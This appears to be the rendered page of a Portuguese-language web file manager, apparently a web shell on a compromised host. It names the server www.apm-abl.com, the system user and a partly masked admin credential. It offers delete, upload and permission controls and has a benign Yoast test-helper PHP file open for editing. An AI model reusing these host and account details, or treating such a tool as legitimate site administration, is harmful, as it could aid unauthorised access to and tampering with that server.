🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_e170bfb8 / b1a4****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: admin-debug-info.php
<?php namespace Yoast\WP\Test_Helper; use Debug_Bar_Panel; /** * Class to manage registering and rendering the admin page in WordPress. */ class Admin_Debug_Info implements Integration { /** * Holds our option instance. * * @var Option */ private $option; /** * Class constructor. * * @param Option $option Our option array. */ public function __construct( Option $option ) { $this->option = $option; } /** * Add the required hooks * * @return void */ public function add_hooks() { \add_filter( 'debug_bar_panels', [ $this, 'add_debug_panel' ] ); \add_action( 'admin_post_yoast_seo_debug_settings', [ $this, 'handle_submit' ] ); } /** * Makes the debug info appear in a Debug Bar panel. * * @param Debug_Bar_Panel[] $panels Existing debug bar panels. * * @return Debug_Bar_Panel[] Panels array. */ public function add_debug_panel( $panels ) { if ( $this->option->get( 'show_options_debug' ) === true && \defined( 'WPSEO_VERSION' ) ) { $panels[] = new Admin_Bar_Panel(); } return $panels; } /** * Retrieves the controls. * * @return string The HTML to use to render the controls. */ public function get_controls() { $fields = Form_Presenter::create_checkbox( 'show_options_debug', /* translators: %1$s and %2$s expand to link to debug bar. */ \sprintf( \esc_html__( 'Add Yoast SEO panel to %1$sDebug Bar%2$s.', 'yoast-test-helper' ), '<a href="https://wordpress.org/plugins/debug-bar/">', '</a>' ), $this->option->get( 'show_options_debug' ) ); return Form_Presenter::get_html( \__( 'Debug Bar integration', 'yoast-test-helper' ), 'yoast_seo_debug_settings', $fields ); } /** * Handles the form submit. * * @return void */ public function handle_submit() { if ( \check_admin_referer( 'yoast_seo_debug_settings' ) !== false ) { $this->option->set( 'show_options_debug', isset( $_POST['show_options_debug'] ) ); } \wp_safe_redirect( \self_admin_url( 'tools.php?page=' . \apply_filters( 'Yoast\WP\Test_Helper\admin_page', '' ) ) ); } }
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar